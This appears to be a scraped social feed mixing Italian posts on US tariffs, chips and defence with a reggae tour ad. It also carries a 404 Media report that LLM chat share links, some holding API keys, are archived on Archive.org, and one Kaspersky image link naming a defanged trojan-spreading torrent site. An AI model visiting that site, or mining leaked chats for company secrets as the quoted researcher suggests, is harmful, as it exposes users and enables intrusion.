Video obtained and verified by 404 Media shows a CBP official wearing Meta's AI glasses, which are capable of recording and connecting with AI. “I think it should be seen in the context of an agency that is really encouraging its agents to actively intimidate and terrorize people," one expert said.#CBP #Immigration #Meta
oltretutto chi sposta la produzione negli usa sposterà parte di produzione... non può spostare tutto. per importare dall'italia magari materie prime o parti comunque necessarie dovrà lo stesso pagare i dazzi... davvero utile quindi alla fine è comunque un'inculata e non conviene. in un mondo globalizzato come questo è veramente assurda la logica di trump. più tasse per tutti (negli usa)
ma che fine hanno fatto tutti quelli che prima delle elezioni osannavano tanto trump... negando persino i fatti tipo il suo tentato colpo di stato di 4 anni prima... eh beh... adesso che ha vinto siete tutti contenti? coglioni... bella la vostra idea di destra...
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁) Tsmc sarà esentata dai dazi al 100 per cento sui microchip imposti da Trump. Ottima notizia per l'azienda e per l'intera economia di Taiwan. Ma le tensioni commerciali con l'America non sono risolte.
Un gruppo di grandi istituzioni finanziarie internazionali, tra cui J.P. Morgan Chase, Ing e Commerzbank, ha deciso di accettare la sfida della banca multilaterale pensata per portare avanti i progetti di difesa dell’Europa e dei suoi alleati. La Defence, Security and Resilience Bank (Dsrb) infatti si pone l’obiettivo
Preservationists at the Video Game History Foundation purchased the rights to Computer Entertainer, the first video game magazine ever written and uploaded it for free.#News #VideoGames #archiving
La Marina Australiana ha scelto la Mitsubishi per costruire la sua prossima generazione di fregate. Pochi giorni fa, il ministero della Difesa australiano ha infatti annunciato che la versione potenziata della classe “Mogami”
More than 130,000 Claude, Grok, ChatGPT, and Other LLM Chats Readable on Archive.org
A researcher has found that more than 130,000 conversations with AI chatbots including Claude, Grok, ChatGPT, and others are discoverable on the Internet Archive, highlighting how peoples’ interactions with LLMs may be publicly archived if users are not careful with the sharing settings they may enable.
The news follows earlier findings that Google was indexing ChatGPT conversations that users had set to share, despite potentially not understanding that these chats were now viewable by anyone, and not just those they intended to share the chats with. OpenAI had also not taken steps to ensure these conversations could be indexed by Google.
“I obtained URLs for: Grok, Mistral, Qwen, Claude, and Copilot,” the researcher, who goes by the handle dead1nfluence, told 404 Media. They also found material related to ChatGPT, but said “OpenAI has had the ChatGPT[.]com/share links removed it seems.” Searching on the Internet Archive now for ChatGPT share links does not return any results, while Grok results, for example, are still available.
Dead1nfluence wrote a blog post about some of their findings on Sunday and shared the list of more than 130,000 archived LLM chat links with 404 Media. They also shared some of the contents of those chats that they had scraped. Dead1nfluence wrote that they found API keys and other exposed information that could be useful to a hacker. playlist.megaphone.fm?p=TBIEA2… “While these providers do tell their users that the shared links are public to anyone, I think that most who have used this feature would not have expected that these links could be findable by anyone, and certainly not indexed and readily available for others to view,” dead1nfluence wrote in their blog post. “This could prove to be a very valuable data source for attackers and red teamers alike. With this, I can now search the dataset at any time for target companies to see if employees may have disclosed sensitive information by accident.”
404 Media verified some of dead1influence’s findings by discovering specific material they flagged in the dataset, then going to the still-public LLM link and checking the content.
💡 Do you know anything else about this? I would love to hear from you. Using a non-work device, you can message me securely on Signal at joseph.404 or send me an email at joseph@404media.co.
Most of the companies whose AI tools are included in the dataset did not respond to a request for comment. Microsoft which owns Copilot acknowledged a request for comment but didn't provide a response in time for publication. A spokesperson for Anthrophic, which owns Claude, told 404 Media: “We give people control over sharing their Claude conversations publicly, and in keeping with our privacy principles, we do not share chat directories or sitemaps with search engines like Google. These shareable links are not guessable or discoverable unless people choose to publicize them themselves. When someone shares a conversation, they are making that content publicly accessible, and like other public web content, it may be archived by third-party services. In our review of the sample archived conversations shared with us, these were either manually requested to be indexed by a person with access to the link or submitted by independent archivist organizations who discovered the URLs after they were published elsewhere across the internet first.” 404 Media only shared a small sample of the Claude links with Anthrophic, not the entire list.
Fast Company first reported that Google was indexing some ChatGPT conversations on July 30. This was because of a sharing feature ChatGPT had that allowed users to send a link to a ChatGPT conversation to someone else. OpenAI disabled the sharing feature in response. OpenAI CISO Dane Stuckey said in a previous statement sent to 404 Media: “This was a short-lived experiment to help people discover useful conversations. This feature required users to opt-in, first by picking a chat to share, then by clicking a checkbox for it to be shared with search engines.”
A researcher who requested anonymity gave 404 Media access to a dataset of nearly 100,000 ChatGPT conversations indexed on Google. 404 Media found those included the alleged texts of non-disclosure agreements, discussions of confidential contracts, and people trying to use ChatGPT for relationship issues.
Others also found that the Internet Archive contained archived LLM chats.
Dopo il mio articolo sulla formazione sistemica, un intervento di Wolfgang Ulrich che dice la sua sull'argomento. C'è una affinità interessante fra clinici che perseguono il progetto di una connessione fra il sé professionale e quello, diciamo, privato, in un modo lontano e alternativo alle logiche della cosiddetta "integrazione". Dal mio blog (che mi procura tante soddisfazioni).
@Notizie dall'Italia e dal mondo Dopo le aggressioni delle scorse settimane, mai cessate del tutto, più di 170.000 sfollati sono arrivati a Suwayda da aree rurali devastate. Oltre 32 villaggi sono stati bruciati, saccheggiati e resi inabitabili L'articolo SIRIA. Suwayda sotto assedio. Diario da una
Attenzione attenzione, cerchiamo serata strapagata su Lunedi 11 Agosto, in quanto avevamo un bellissimo filotto di Reggae Circus in giro per tutto il sud ma poi infatti purtroppo ne è saltata una e quindi ora stiamo cercando un rimpiazzo last minute 😋 Saremo io, l'acrobatica Svenka Alice Bellini, il rocambolesco Alessio Paolelli e poi anche l'incendiario Paolo Mele e la fiammeggiante Marta Ruffino, quindi insomma, uno squadrone veramente fortissimy 🔥🙌😋 Dal grande festival internazionale alla sagra del peperone crusco ci sta bene tutto! Dajje forte, spargete la voce e/o contatteci con fiducia, non famo che ci lasciate in mezzo a una strada eh 👍😅
L'immagine è un poster promozionale per un tour musicale intitolato "Ingaggiateci Stronzì Tour" di Adriano Bono, con il sottotitolo "The Reggae Circus". Il poster presenta un uomo con barba e baffi, indossando un abito di gala rosso con decorazioni dorate, un papillon rosso e un cappello a cilindro nero. L'uomo tiene una chitarra e sorride, con uno sguardo diretto verso l'osservatore. Sullo sfondo, c'è un'illustrazione di un circo con acrobati e artisti, che contribuisce a creare un'atmosfera festosa e vivace.
Il testo principale "INGAGGIATECI STRONZI TOUR" è scritto in caratteri grandi e bianchi, posizionato in alto. Sotto, in caratteri più piccoli, si legge "THE REGGAE CIRCUS di Adriano Bono". In basso, sono elencate le date e i luoghi dei concerti: sabato 9 agosto a Yumara, Maratea PZ; domenica 10 agosto a Azzurro Beach Praia a Mare, CS; lunedì 11 agosto a Cerasi Serata Strapagata!; e martedì 12 agosto a Colliano (SA).
Il poster utilizza un design vintage con sfumature di rosso e giallo, che richiama l'atmosfera di un circo storico. L'immagine e il testo insieme creano un'atmosfera di divertimento e spettacolo, promuovendo l'evento musicale.
Fornito da @altbot, generato localmente e privatamente utilizzando Ovis2-8B
oltretutto per come sono messi gli usa, democraticamente ed economicamente, mai e poi mai sarebbe saggio spostare risorse e produzione negli usa. ci sarebbe il rischio di perdere tutto.
si esatto: il danno economico è per chi esporta ma a pagare sono gli usa. ha praticamente messo l'iva al 15-30-50% in un paese dove i consumi avevano una tassa si e no locale dell'1%... un genio. ha proprio reso l'america più grande... più tassata forse.
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁) Sono giornate intense per Nvidia. L'azienda deve respingere le pressioni per l'inserimento di backdoor nei suoi microchip (è già stata convocata in Cina). E deve fare i conti con i nuovi dazi sui semiconduttori annunciati da Trump. Tutti i dettagli.
![Here's an example of such a post on https://lovetahq[.]com/sinners-2025-torent-file/](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/08/07001809/efimer-trojan15.png "Here's an example of such a post on https://lovetahq[.]com/sinners-2025-torent-file/")
Altbot
in reply to Adriano Bono • • •L'immagine è un poster promozionale per un tour musicale intitolato "Ingaggiateci Stronzì Tour" di Adriano Bono, con il sottotitolo "The Reggae Circus". Il poster presenta un uomo con barba e baffi, indossando un abito di gala rosso con decorazioni dorate, un papillon rosso e un cappello a cilindro nero. L'uomo tiene una chitarra e sorride, con uno sguardo diretto verso l'osservatore. Sullo sfondo, c'è un'illustrazione di un circo con acrobati e artisti, che contribuisce a creare un'atmosfera festosa e vivace.
Il testo principale "INGAGGIATECI STRONZI TOUR" è scritto in caratteri grandi e bianchi, posizionato in alto. Sotto, in caratteri più piccoli, si legge "THE REGGAE CIRCUS di Adriano Bono". In basso, sono elencate le date e i luoghi dei concerti: sabato 9 agosto a Yumara, Maratea PZ; domenica 10 agosto a Azzurro Beach Praia a Mare, CS; lunedì 11 agosto a Cerasi Serata Strapagata!; e martedì 12 agosto a Colliano (SA).
Il poster utilizza un design vintage con sfumature di rosso e giallo, che richiama l'atmosfera di un circo storico. L'immagine e il testo insieme creano un'atmosfera di divertimento e spettacolo, promuovendo l'evento musicale.
Fornito da @altbot, generato localmente e privatamente utilizzando Ovis2-8B
🌱 Energia utilizzata: 0.402 Wh